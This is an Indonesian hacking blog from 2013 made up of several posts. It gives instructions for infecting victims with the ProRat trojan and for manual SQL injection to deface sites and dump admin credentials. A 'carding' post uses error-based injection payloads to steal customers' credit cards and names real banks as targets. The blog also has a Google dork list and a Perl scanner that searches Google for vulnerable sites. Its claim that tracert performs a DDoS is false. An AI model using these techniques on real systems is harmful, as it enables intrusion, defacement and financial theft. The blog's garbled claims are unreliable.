Jumat, 18 Oktober 2013

Hacking Speed IDM


      Gan , tadi ane searching2 di Forum sebelah , ternyata ada trit "Cara setting IDM biar Bikin ngacir-cir". nah buat kalian agan2 yang menggunakan download manager IDM, kadang belum benar-benar merasakan manfaat dari SW tsb, karena belum disetting dengan benar. Jika sudah diseting, IDM akan berfungsi optimal, meskipun kita gonta-ganti tipe koneksi (wive-LAN, WIFI, Dial-up, dll).
Nah bagemana caranya biar agan2 bisa merasakan manfaat ilmu yang ane dapet hingga bikin downloadan nte yang biasanya sejam berubah jadi 15 menit , jadi bisa hemat waktu gan. Pertannyaanya, Bagaiamana caranya Membuat IDM Download 3x Lebih Cepat alias Ngaciiir ?
Gini caranya:


1. klik IDM di try icon
2. klik Option
3. Pada Connection/ Speed, pilih Other, dan pada Default Max conn.number pilih 16
4. Tutup IDM
5. Klik Start kemudian un dan tuliskan "regedit" tanpa petik , kemudian klik ok , Jalankan Regedit>HKey_Current_User>Software>Download Manager> (lihat jendela kanan) Connection Speed>double click>pilih decimal> isi dengan 9999999999999>OK
6. tutup regedit (close )
7. Coba ntuk DL....;-)
Catatan:
Kecepatan Download dipengaruhi juga oleh kondisi jaringan yg ada.. 

Kamis, 17 Oktober 2013

Hacking Dengan Tools ProRat V1.9 Buatan Turki

  • TOOL HACKER 

     


       Tools buatan orang turki ini berfungsi untuk menyusup ke komputer orang lain. Caranya sangat gampang dan mudah, tinggal kita mengetahui IP dan Port komputer Komputer lain saja, maka kita dapat langsung bisa mengetahui informasi dari PC, mengirimkan pesan error, mematikan komputer, mengunci mouse, membuka CD-ROM atau bahkan memotret wajah si pemilik komputer yang telah di Hack .. tapi ingat ini bukan untuk menjahili... ini hanya untuk pembelajaran saja.
  • CARA Menggunakan ProRat
     Pertama kali kita harus mengetahui terlebih dahulu IP dan Port korban yang terbuka. Kita dapat melakukannya dengan cara manual atau juga dengan bantuan tool Ports Scanner...
      Langkah selanjutnya yaitu kita jalankan ProRat,
tools ini dapat kamu download Disini. Password : Pro
      Sebelumnya matiin dulu Anti Virus kamu (disable), karena ProRat akan terdeteksi sebagai virus. Padahal dia tidak berbahaya bagi komputer kita. Setelah itu isikan IP korban pada form IP dan Portnya (default 5110). Apabila kita klik tombol Connect maka koneksi ke komputer korban belum bisa, karena komputer korban belum kita infeksi. Untuk menginfeksi komputer korban kita terlebih dahulu membuat server yang akan dijalankan pada komputer korban.
Kita tinggal menjalankan Server tersebut dikomputer korban.
Setelah Server tersebut berhasil berjalan pada komputer korban, maka kita langsung mencoba mengkoneksikannya dengan komputer kita.
Untuk koneksi kita dapat menggunakan ProConnective atau langsung mengetikkan IP address dan Port komputer korban. ProConnective adalah tools bawaan dari ProRat yang berfungsi sebagai Bridge (jembatan koneksi) antara komputer server dan komputer client (korban). Akan nampak IP korban apabila dia sedang on.
       Setelah berhasil melakukan koneksi ke komputer korban maka status dari ProRat akan berubah dari Disconnected ke Connected.
Selamat mencoba dan semoga di pergunakan untuk hal yang baik2 aja… ok Bro.

Senin, 14 Oktober 2013

Perintah-perintah commandprompt untuk jaringan

        Postingan saya kali ini memperlihatkan beberapa perintah yang bisa anda gunakan pada command prompt. perintah-perintah command prompt di bawah ini berkenaan dengan perintah yang berfungsi untuk jaringan. jadi perintah yang tidak berkenaan dengan jaringan tidak saya tampilkan. ok, beberapa perintah tersebut adalah sebagai berikut :

1. ipconfig /all
Menampilkan informasi konfigurasi koneksi, misalnya Host Name, Primary DNS Type, Ethernet Adapter LAN, MAC address.

2. ipconfig /flushdns
Menghapus DNS Cache

3. ipconfig /release
“Menghapus” semua koneksi IP Address.

4. ipconfig /renew
Membuat IP Address baru untuk adapter tertentu.

5. ipconfig /displaydns
Menampilkan DNS Cache.

6. ipconfig /registerdns
Melakukan refresh DNS dan meregister kembali koneksi DNS.

7. ipconfig /showclassid
Menampilkan informasi DHCP Class.

8. ipconfig /setclassid
Mengubah DHCP Class ID

9. control netconnections
Menampilkan Network Connection.

10. nslookup
Mengetahui alamat ip address dari nama domain yang di tuliskan

11. netstat
Menampilkan informasi koneksi TCP/IP yang sedang aktif.

12. route
Menampilkan local route.

13. hostname
Menampilkan nama komputer.

14. ping
Contoh: ping cybervirburg32.blogspot.com
Melakukan test koneksi ke situs cybervirburg32.blogspot.com
Semakin sedikit % loss-nya maka semakin baik koneksinya.

15. tracert
Menampilkan informasi IP Address route.
contoh: tracert cybervirburg32.blogspot.com 
16.net view
menampilkan user yang sedang login

17.Net User
menampilkan semua login pada host

18.shutdown -i / -m \\computer name ( sebagian perintah bisa juga digunakan untuk komputer standalone )
mematikan/restart komputer dalam jaringan secara remote, ada berbagai parameter pada perintah ini.
*parameter -a untuk abort shutdown
*parameter -s untuk shutdown komputer
*parameter -c untuk menulis pesan saat proses shutdown
*parameter -r untuk restart
*parameter -l untuk logoff
*parameter -t untuk menentukan interval waktu dilakukannya shutdown
*dll
contoh:
shutdown -s -t 60 -c "sorry you are disconected"
mematikan komputer dalam hitungan mundur selama 60 detik dengan menampilkan pesan "maaf koneksi anda diputus"

19.arp -a untuk menampilkan arp komputer anda, dan parameter arp -s "ip adrress" "MAC adrress" untuk merubah/membuat arp anda dari dynamic menjadi static.


Mungkin Hanya ini saja yang bisa saya pos.. lebih dan kurang saya minta maaf.
semoga postingan saya kali ini bermanfaat,
tapi jangan lupa jempolnya Gan.. hehehe.. :)

Tutorial cara Pencarian Hacker Di Google

1. Mencari FTP Server yang isinya buku gratis
script (note:Lakukan Di Kotak Cari Google ):
index.of <spasi> intitle:<ga pake spasi>hacking <spasi> books


2. Mencari kata hacking di URL
script (note:Lakukan Di Kotak Cari Google ):
allinurl:<ga pake spasi>"hacking"

3. Mencari Nama seseorang di seluruh Web
script (note:Lakukan Di Kotak Cari Google ):
allintext:<ga pake spasi>"nama orang yang dicari"

4. Mencari Dua tema yang berkaitan
script (note:Lakukan Di Kotak Cari Google ):
"HACKING"<spasi> &&<spasi>"FACEBOOK"

5. Mencari url untuk SQL INjection
script (note:Lakukan Di Kotak Cari Google ):
inurl:<ga pake spasi>*.php/id=
atau
inurl:".php/id="


Ok, Sekian dari saya, mudah-mudahan yang sedikit ini bermanfaat buat agan- agan sekalian.

Jumat, 11 Oktober 2013

Tutorial Hacking Mengunakan SQLI Helper v.2.7

     Cybervirburg32 kali ini mau posting tutorial hacking mengunakan SQLI Helper v.2.7..
kayaknya udahhh pada tau'kan apa itu SQLI Helper, itu lohh tools buat hacking website.pokoknya banyak dech kegunaanya.OK Br0 lanjutt aja ke TKP.. ikuti tutorial'a sampai habis.. :)

1. Download terlebih tools SQLI Helper v.2.7 disini

2. Cari target web yang akan di deface disini

3. Setelah menemukan target yang vuln menggunakan dork, kita buka tools SQLI Helper'nya.

Berikut tampilan toolsnya




4. Nah, masukkan url target ke kolom "target" lalu klik "inject"

5. Tunggu prosesnya selesai. Ini memakan waktu sekitar 5-10 menit (lihat bagian bawah tools)




6. Jika sudah, maka akan muncul informasi mengenai target di kolom "host information. Anda klik 1x pada "current database" di kolom "host information" lalu klik "get database"




7. Nanti akan muncul database target di kolom "database name". Anda klik 1x databasenya (selain information schema) lalu klik "Get tables"




8. Jika sudah, akan terdapat beberapa tables yang muncul pada kolom "table name". Anda harus mengira - ngira kira - kira ada dimana username dan password admin web target. Jika anda sudah merasa menemukan table yang berisikan username dan password, anda klik 1x pada table itu lalu klik "Get columns"




9. Nah, bakalan muncul column yang berisikan username dan password target di kolom "column name". Anda klik 1x pada column yang berisikan username dan column yang berisikan password, kemudian klik "Dump now"

10. Taadaa... Anda sudah menemukan username dan password target. Anda crack terlebih dahulu disini

11. Jika username dan password yang berbentuk MD5 tadi sudah anda crack, anda tinggal cari admin page web tersebut.

Semoga sukses ^_^

Cara Mengecek Web yang Down dengan Command Prompt

      Dalam melakukan aksi DDoS, tidak lengkap rasanya tanpa menggunakan Command Prompt. Biasanya Command Prompt digunakan untuk mengecek target DDoS sudah lumpuh atau belum.

   
 

Untuk itulah kali ini saya akan share cara untuk mengecek web yang down dengan command prompt.
1.  Buka cmd dgn cara tekan windows + r > ketik cmd > enter
2. Ketikkan perintah berikut :
 
ping www.target.com -t

3. Kalian bisa ganti www.target.com dengan link web yang di DDoS

4. Tekan enter

5. Kini proses ping berjalan, jika terdapat tulisan "reply from bla..bla..bla..bla.." itu menandakan web masih up, tapi jika tulisan "request time out" muncul berkali-berkali itu menandakan web sudah down.

Ini contohnya

DDos mengunakan CMD

      Nah. Setelah Cybervirburg32 share cara ddos dengan notepad beberapa hari yang lalu, Kali ini Cybervirburg32 akan tunjukkan lagi cara DDoS menggunakan command prompt (cmd). Ya meskipun ini cara lama yang penting sharing :D Ok simak baik - baik.

1. Buka cmd, caranya start -> run -> ketik cmd -> enter

2. Ketik tracert www.target.com
    ganti www.target.com dengan link situs target anda

3. Tekan "enter"

4. Proses DDoS kini sedang berjalan. Silahkan tunggu beberapa jam hingga target down sambil minum kopi :D. Jika laporan mengalami request time out berulang kali brarti target bisa dikatakan mulai down.

Screenshot contoh

DDOS CMD
Selamat mencoba.. :)

All Dork google

Kali ini Cybervirburg32 mau share kumpulan Dork buat Deface web..
tp sebelumnya udah pada tau'kan apa itu Dork..!!!
oke dari pada panjang lebar, mending langsung aja ke TKP...

trainers.php?id=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
humor.php?id=
communique_detail.php?id=
sem.php3?id=
opinions.php?id=
spr.php?id=
pages.php?id=
chappies.php?id=
prod_detail.php?id=
viewphoto.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
detail.php?ID=
publications.php?id=
Productinfo.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
channel_id=
newsid=
news_display.php?getid=
ages.php?id=
clanek.php4?id=
review.php?id=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
look.php?ID=
galeri_info.php?l=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
offer.php?idf=
index.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
newsitem.php?num=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
announce.php?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
index.php?=
profile_view.php?id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
newsid=
trainers.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
readnews.php?id=
newsone.php?id=
product-item.php?id=
pages.php?id=
clanek.php4?id=
viewapp.php?id=
viewphoto.php?id=
galeri_info.php?l=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
story.php?id=
look.php?ID=
aboutbook.php?id=
nie yang paling lengkap bos di sini
nahhhh... dari Dork yg di atasss mungkin sangatt cukup untuk agan-agan berkarya.
moga postingan Cybervirburg32 ini bermanfaat buat agan-agan sekalian..
selamattt mencoba.. :)

Cara Deface Web Dengan SQL

     

1. Anda cari target web untuk di di deface menggunakan dork. Bisa anda cari disini

2. Ketikkan dork itu di kotak pencarian google, maka akan muncul banyak web di hasil pencarian. Silahkan anda buka salah satu

3. Tambahkan karakter ' pada akhir url'nya untuk mengetahui vulnerability'nya
Contoh : www.site.com/news.php?id=32'

4. Jika muncul tulisan seperti "syntax error" berarti web tersebut vuln alias bisa kita deface
Contoh errornya : warning: mysql_fetch_array(): supplied argument is not a valid MYSQL result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line

5. Sekarangnya saatnya kita beraksi. Cari jumlah table yang ada pada database web tersebut dengan cara menambahkan karakter +order+by+1-- di belakang url
Contoh : www.site.com/news.php?id=32+order+by+1--

Anda coba satu persatu hingga muncul tulisan error.
Contoh : www.site.com/news.php?id=32+order+by+2--
www.site.com/news.php?id=32+order+by+3--
www.site.com/news.php?id=32+order+by+4--

Saya memisalkan jumlah table web ada 4 (errornya di 4)

6. Kemudian kita gunakan perintah union untuk mengeluarkan nomor yang nantinya kita gunakan. Tambahkan +union+select+1,2,3,4--
Contoh : www.site.com/news.php?id=32+union+select+1,2,3,4--
Saya memisalkan angka 3 yang keluar

7. Sekarang masukkan version() pada angka 3 untuk memaparkan version
Contoh : www.site.com/news.php?id=32+union+select+1,2,version(),4--

8. Kita munculkan nama - nama table yang ada pada web tersebut dengan memasukkan perintah table_name pada angka 3 dan perintah +from+information_schema.tables-- dibelakang url
Contoh : www.site.com/news.php?id=32+union+select+1,2,table_name,4+from+information_schema.tables--
Nantinya kita akan melihat nama nama table yang ada pada web

9. Kita lihat isi yang ada di dalam table tersebut dengan memasukkan perintah group_concat(table_name) pada angka 3 dan perintah +where+table_schema=database()-- di akhir url
Contoh : www.site.com/news.php?id=32+union+select+1,2,group_concat(table_name),4+from+information_schema.tables+where+table_schema=database()--

10. Selanjutnya kita keluarkan isi yang ada di table tersebut (column) dengan memasukkan perintah group_concat(column_name) pada angka 3 dan +from+information_schema.columns+where+table_name=0xHasilConvertTextTableAdmin-- di akhir url
Untuk langkah ke 10 ini silahkan anda convert terlebih dahulu text nama table'nya ke hexadecimal disini
Jadi misalkan nama table'nya tadi admin maka jika di convert akan menjadi 61646D696E
Contoh : www.site.com/news.php?id=32+union+select+1,2,group_concat(column_name),4+from+information_schema.columns+where+table_name=0x61646D696E--
Nanti akan muncul column yang berisikan username dan password

11. Lalu kita lihat isi dari column yang kita temukan. Saya misalkan nama tablenya adalah admin, dan isi dari table admin adalah column username & password. Maka masukkan perintah concat_ws(0x3a,"nama column yang ada di dalam table admin") pada angka 3 dan perintah +from+Admin-- di akhir url
Contoh :  www.site.com/news.php?id=32+union+select+1,2,concat_ws(0x3a,"username,password"),4+from+Admin--

12. Maka kita akan melihat username dan password admin dari web tersebut. Saatnya kita eksekusi.

13. Cari admin pagenya, biasanya dengan menambahkan tulisan berikut di akhir url web target.
/admin/ , /administrator/ , /webadmin/ , /adm/ , /webbase/
Contoh : www.site.com/admin/
Nah isikan username dan password yang tadi di dapat. Jika password berbentuk MD5 seperti e10adc3949ba59abbe56e057f20f883e, anda crack dulu disini

Memang tidaklah semudah membalik telapak tangan, belajarlah sedikit sedikit.
Banyak cara yang dapat dilakukan untuk deface sebuah web, salah satunya yaitu dengan teknik SQL Injection. Banyak sekali para hacker/defacer yang menggunakan cara ini. Dan saya akan menunjukkan langkah - langkahnya.

Cara mencuri kartu credit

  
hm...!!Sebelum nya maaf kan penulis kalau judul nya cenderung untuk berniat jahat.tapi jangan salah...!!justru setelah membaca tulisan yang singkat ini mampu membuat para perusahaan memiliki security yang benar-benar bisa di andalkannach...!!kita mulai untuk mengetahui aksi-aksi para carder.sebenar nya tak perlu mempunyai banyak ilmu mengenai IT(Internet Technology)cukup sering browsing/surfing.berikut akan saya ulas sedikit aksi dari para carder. SQL(Simple Query Laguage)tau gak apa SQL ini?kalo lom tau nach...cari tau dulu dech. untuk mencari perusahaan yang ingin kita kuras database/isi-isi dan termasuk kartu kredit para pelanggan nya.Caranya:gunakan search engine.yang saat ini paling populer yaitu GOOGLE.ketikan nama perusahaan yang akan di tuju.contoh nya:http//:www.bankbri.co.id.maka tambahkan di akhirnya kata-kata ADMIN/ASP Aatau PHP. EH TAU GAK??HTTP-WWW-PHP-ASP???DUH..GIMANA MO JADI HACKER KALO KEPANJANGAN ITU AJA GAK TAU.ININIH KEPANJANGAN NYA.ARTINYA CARI SENDIRI... HTTP=HYPER TEXT TRANSPER PROTOCOL WWW=WORD WIDE WEB PHP=HYPER TEXT PREPROCESSOR ASP=ACTIVE SERVER PAGE Naah...!!kalo udah tau kepanjangan nya.khan enak...!! kita lanjut pembahasan kita kali ini.tadi kan dah di contoh kan bankmandiri.co.id yang akan di kuras.ketikkan di ujung nya tambahan admin.asp ato php.maka secara otomatis akan dipinta username dan password nya. naah..tugas kita adalah mencari username dan pasword nya.gimana caranya bang??kita pura-pura tau aja dengan memasukkan dibagian username+password.eeh sebelum nya.tau gak???kalo pesan error itu memberi arahan untuk mencari username nya.nah...gini cara-caranya.ada lima caranya ketikkan dibagian username:

  1. '; drop table user--(-;=dinamakan: single line comment,gunanya apa?gunanya agar tidak terjadi error pada saat dijalankan
  2. pada bagian username: admin'--
  3. ------------^^------------------: 'or 1=1-
  4. ------------^^------------------: 'union select 1, 'fictional_user' . 'some_password' . 1--
  5. atau dengan sengaja mengisi bidang username salah untuk mendapat kan pesan error yang ditampilkan(error message)gunanya melacak dari pesan tadi.jangan salah lho.....pesan error ternyata ada fungsinya. ketikkan saja: 'having 1=1- -
maka pesan yang akan muncul sebagai berikut:
[Microsoft ODBC SQL SERVER DRIVE] [SQL SERVER] colomn 'USER.id is invalid in the select list because it not contained in an aggregate function and there is no group by clause/ proces_login.asp,line 35
 
nah....!! sekarang kita tau.kalau pesan error nya bilang begitu berarti dia pake  'user.id.maka kembali ketikkan ulang di username: 'grup by user.id having 1=1- -
maka otomatis akan muncul pesan error lagi sama seperti di atas cuma ada perubahan pada bagian stelah colomn ='user.username'
naaah..!!kita dapat lagi.maka kita susul lagi dengan mengisikan pada username,sekali ini kita cek password nya.dia pake password ato gak.
ketikkan di username: 'group by user.id, user.username.password,user.privs having 1=1- -
jika memungkin kan tidak terjadi error maka tabel user mamang bener ada password nya.maka kita coba lagi isi di bidang username: 'union select sum(username)from user- -
tau gak?? sum=yang terdapat angka metematis/integer.seperti 1234 sampe 9.jika error berarti username brtype varchar.apalagi tuh varchar bang??varchar=huruf yang tidak memiliki nilai matematis.dari A ampe Z.lah..kalo bener dia pake varchar maka akan muncul pesan error. koq errror terus seeh??karna emang kita khan mencari username+passwrd dari pesan errornah...!!!kita lanjut.sekarang pesan error nya begini:
MICROSOFT OLE DB Provider for ODBC driver error'8004e07'
[MICROSOFT] [ODBC SQL SERVER DRIVER] [SQL SERVER]
The sum or average aggregate operation cannot take a varchar data type as an argument
/process_login.asp,line 35

maka kita isi lagi: 'unio select
pesan error nya kurang lebih berbunyi:
@@version,1,1,1- -
Microsoft OLEDB,PROVIDER FOR ODBC DRIVER ERROR ' 8004E07 ' [MICROSOFT] [ODBC SQL Server Driver] [SQL Server]
syntax error convertingthe nvachar value
' microsoft SQL Server 2000-8.00.194(intelx86)aug 6 2000 00:57:48 Copy right (c)1988-2000 microsoft corporation enterprice edition on windows NT 5.0(build 2195:server pack 2) to 2 column of data type int.
/process_login.asp,line 35

nah....!! selanjut nya atas perintah pesan tadi kita mengkonversi konstanta @@version kedalam bentuk integer
username: 'union select min(username),1,1,1 from user where username> 'a' - -
maka akan muncul error message:
microsoft OLE DB provider for ODBC dRIVER ERROR '8840e07'
[microsoft] [odbc sql server driver] [sql server]syntax error converting the varchar value 'ADMIN' to a column of data type int.
/process_login.asp,line 35

nah....!! ada account admin.maka tugas kita gali lagee...
username: 'union select min(username),1,1,1 from user where username> ' admin ' - -

maka akan muncul pesan error
microsoft OLE DB Provider for ODBC driver error ' 80040e07'
[microsoft] [ODBCSQL SERVER DRIVER] syntax error converting the varchar value ' roger ' to a column of data type int.
/process_login.asp,line 35

oke.....!!sekarang kita dapet username dengan nama : roger sekarang kita cari password nya,untuk pengguna roger :
username= ' union select password,1,1,1from user where username= ' admin ' - -  
maka akan muncul pesan error.yang berbunyi........misal:
microsoft OLEDB Provider for ODBC driver error '8004e07'
[microsoft] [ODBC SQL SERVER DRIVER] syntax error converting the varchar value ' bryan 200' to a column of data type
/process_login.asp,line 35

DAPAT......!!!KALAU UDAH BEGINI MAU APA LAGI?? TERSERAH LOE DECH...mau ngapain aja loe suka-suka ati kau lah.mau di acak-acak tuch database nya.tapi...jangan lupa.berhubung judul kita kali ini CARDING(PEMBOBOL KARTU KREDIT)Nah...musti kartu kredit pelanggan yang di cari.....
nah...untuk kali ini udah dulu dech....ampe sini aja doeloe.eiiit...tapi masih ada lagi yang harus kamu ketahui.yaitu setelah dapet kartu kredit kira-kira tuch kartu masih valid gak 
ya???jangan-jangan tuch kartu dah abis masa berlakunya cemen dech jadinya....hehehe.jadi gimana caranya bang??cara menguji validitas kartu kredit bisa dibaca di: lanjutan carding/pembobol kartu kredit.
  nahh..kalo udah dapet tuh kartu kredit yang asli...jangan coba-coba asal maen beli.sembunyikan identitas doeloe..caranya bang???pokok nya baca aja di judul itu dech....dijamin gak nyessel.
selamat mencoba

Rabu, 09 Oktober 2013

Situs Hacker Indonesia

    Berikut ini adalah list daftar situs hacker Indonesia / daftar situs hacking Indonesia / daftar web hacker Indonesia / daftar web hacking Indonesia / daftar website hacker indonesia / daftar website hacking Indonesia / daftar situs cracker Indonesia / daftar situs cracking Indonesia / daftar web cracker Indonesia / daftar web cracking Indonesia / daftar website cracker indonesia / daftar website cracking Indonesia.
Berikut adalah List Situs Hacker Indonesia:



  1. www.binushacker.net
  2. www.jasakom.com
  3. www.echo.or.id
  4. www.kecoak.org
  5. www.devilzc0de.org
  6. www.spyrozone.net
  7. www.yogyacarderlink.web.id
  8. www.nyit-nyit.net
  9. www.indonesianhacker.or.id
  10. www.muslimhacker.net
  11. www.sekuritionline.net
  12. www.exploit-id.com
  13. www.surabayahackerlink.org
  14. www.xcode.or.id
  15. www.hacker-newbie.org
Berikut ini adalah daftar website hacker luar negeri / List site hacker / list site hacking / list web hacker / list web hacking / list website hacker / list website hacking / list site cracker / list site cracking / list web cracker / list web cracking / list website cracker / list website cracking around the world.
Tambahan List Situs Hacker Luar Negeri:
  1. www.packetstormsecurity.org
  2. www.phrack.org
  3. www.blackhat.com
  4. www.hackforums.net
  5. www.hackinthebox.org
  6. www.securityxploded.com
  7. www.hackaday.com
  8. www.darknet.org.uk
  9. www.securiteam.com
  10. www.seclist.org
  11. www.metasploit.com
  12. www.backtrack-linux.org
  13. www.secmaniac.com
  14. www.irongeek.com
  15. www.hak5.org
Sebenernya masih banyak lagi yang lainnya, cuman ya cukup sampai situ aja ya listnya. Yang lain bisa dicari sendiri referensinya
Semoga bermanfaat, selamat menimba ilmu..

Tools Hacker

Tool apa saja yang biasa di pakai seorang hacker ? Ada banyak tool dari berbagai situs "hackX0r" di internet, bagaimana kita mengetahui apa yang kita perlukan dan mana yang tidak? Baiklah, pada posting ini akan coba dijelaskan beberapa tool dasar yang seringkali hacker gunakan. Namun perlu di ketahui bahwa tidak semua hacker memerlukan atau menggunakan tool-tool ini, tapi kebanyakan sich begitu.
Daftar tool yang tertulis disini tidaklah lengkap, dan setiap hari ada saja program baru yang dirilis oleh hacker, jadi hanya dasar-dasarnya.
-------------------------------------------------------------------------------------------------
CATATAN: Jangan mendownload program apapun dari website hacking yang di host angelfire, geocities , tripod atau warez. Mengapa? karena besar kemungkinan berisikan trojan, worm, virus dan berbagai kode jahat lainnya. Saya sarankan untuk mendownload program tersebut melalui website www.packetstromsecurity.org
-------------------------------------------------------------------------------------------------
Berikut ini tool yang umum digunakan oleh hacker:

PORT SCANNER
melakukan scanning target untuk melihat port mana saja yang terbuka.

LANGUAGE INTERPRETER
atau COMPILER
Melakukan kompilasi script dan program.

CGI VULN SCANNER

melakukan scanning untuk melihat celah keamanan cgi.

EXPLOIT

mencoba memperoleh akses sebagai superuser pada suatu sistem.

ROOTKIT

agar tetap hidden dan membuat 'backdoor' agar mudah mengakses sistem tersebut nantinya.

TROJAN

mendapatkan akses ke suatu sistem sekedar mengeksploitasi user yang rada-rada bodoh ... hehehe.

SNIFFER

mengumpulkan data dari suatu jaringan komputer.

BRUTE FORCER

mencoba berbagai kombinasi karakter hingga mendapatkan password yang sebenarnya.

WINGATE SCANNER

Scan terhadap ip dan memeriksa apakah ada WinGate yang terinstall

GDB

gnu debugger untuk mempelajari lebih dalam tentang bagaimana program tersebut bekerja.

GCC

gnu c compiler untuk kompilasi program C dan menjadikannya program tersebut lebih mudah dipahami dan digunakan.

Kira-kira demikian yang dapat disampaikan, ini hanyalah daftar umum dan tidaklah lengkap. Sekali kita memiliki tool ini kita dapat bergerak ke tingkat lanjut. Hanya saja, jangan mencoba seluruh program sejenis "NUkeR-2k" atau berbagai program yang ditawarkan melalui berbagai website yang tidak resmi dan kurang terkenal hanya karena ingin tampil beda. Buang-buang waktu saja!

Dan sekali lagi, tulisan ini pernah saya baca dan saya posting ulang hanya dengan satu tujuan yaitu Pengetahuan saja, untuk lebih detail cara penggunaanya silahkan mencoba

SQL Injection Scanner [perl]


yeah, g'd evening
Share tools lagi nih, kemarin gw share tools  SQL Injection scanner yg di tuliskan menggunakan bahasa PHP.
Dan sekarang mari kita coba scanner yang lebih keren lagi, scanner ini ditulis menggunakan bahasa Perl (wiw)
Check the source

#!/usr/bin/perl
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# .:. Script : SQLi Vulnerable Scanner        .:.
# .:. Version : 3.0 fixed (06/10/2012)        .:.
# .:. Author : Metropolis                     .:.
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# .:. MySQL Injection                         .:.
# .:. MSAccess Injection                      .:.
# .:. MSSQL Injection                         .:.
# .:. Oracle Injection                        .:.
# .:. Blind Injection                         .:.
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
#  Useless version :
#  http://pastebin.com/kKxCCJuU 1.0
#  http://pastebin.com/FyPcTLRw 2.0
use LWP::UserAgent;
use Getopt::Std;

getopt('kpo', \%opts);
if($opts{'k'} eq '')
{
print "[Help] SQLi.pl -k shopping.php?id= -p 500\n"; # Max: 50,100,500,700,etc...
}
if($opts{'p'} eq '')
{
    $opts{'p'} = 1;
}

print <<"Metropolis_intro";


    ___________
   |.---------.|
   ||      ||
   || 5c4nn3r ||   SQL injection attack!
   ||         ||    Break the system!
   |'---------'|
    `)__ ____('    
    [=== -- o ]
  __'---------'__
[::::::::::: :::]
[:::::::::::::::]
Metropolis_intro
system('COLOR A');
print "\n\n";
print "h4x0ring ...\n";
print "--------------------------\n\n";


for($start = 0;$start != $opts{'p'}*10;$start += 10)
{
    $t = "http://www.google.co.id/search?hl=fr&q=".$opts{'k'}."&btnG=Search&start=".$start;
    $ua = LWP::UserAgent->new;
    $ua->timeout(10);
    $ua->env_proxy;
    $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E");
    $response = $ua->get($t);
    if ($response->is_success)
    {
        $c = $response->content;
        @stuff = split(/<a href=/,$c);
        foreach $line(@stuff)
        {
            if($line =~/(.*) class=l/ig)
            {
                $out = $1;
                $out =~ s/"//g;
      $out =~s/$/\'/;
         
    $ua = LWP::UserAgent->new;
    $ua->timeout(10);
    $ua->env_proxy;
    $response = $ua->get($out);
            $error = $response->content();
            if($error =~m/SQL syntax/)
                {print "$out Vulnerable MySQL!\n";}
             
            elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft Access Driver/)
                {print "$out Vulnerable MS Access!\n";}
             
            elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error =~m/Unclosed quotation mark/)
                {print "$out Vulnerable MSSQL!\n";}
         
            elsif($error =~m/mysql_fetch_array()/ || $error =~m/mysql_num_rows()/)
                {print "$out Vulnerable Blind Possible!\n";}
             
            elsif($error =~m/Microsoft OLE DB Provider for Oracle/)
                {print "$out Vulnerable Oracle!\n";}
             
            }
        }
        }
        }
Jangan lupa save dengan ekstensi .pl (contoh: sql.pl)
Jangan lupa juga, ente harus udah install perl (kalo OS windows, coba install Active Perl, kalo Linux sih udah ada )
Scannernya ampuh juga kok :)
Buat jalanin programnya
perl namafile.pl -k <dork> -p <page>
contoh :
perl sql.pl -k inurl:gallery.php?id= -p 100

Tools Online


nie ane mau share tools online buat agan-agan sekalian..
moga aja bermanfaat.
ya udahhh langsung aje ke Lokasi'a br0..
  
PICTURE To ASCII Convert -
http://picascii.com

Whois - IP Address - Domain Name Lookup -
http://cqcounter.com/whois/

AdHoc IP Tools
http://tatumweb.com/iptools.htm

Ben's Web Utilities
http://www.phaster.com/find_info_net_traffic.html

central OPS
http://centralops.net/co/

dihe's IP Indexhttp://ipindex.homelinux.net/index.phpDomain Tools
http://www.domaintools.com/

Global Whois Search
http://www.ratite.com/whois/whois.html

Multi DNS Lookup (Bankes.com)
http://www.bankes.com/nslookup.htm

Network Solutions
http://www.networksolutions.com/whois/index.jsp

Public DNS Servers List
http://80.247.230.136/dns.htm

BGPPlay
http://www.ris.ripe.net/bgplay/

BrowserSpy
http://browserspy.dk/

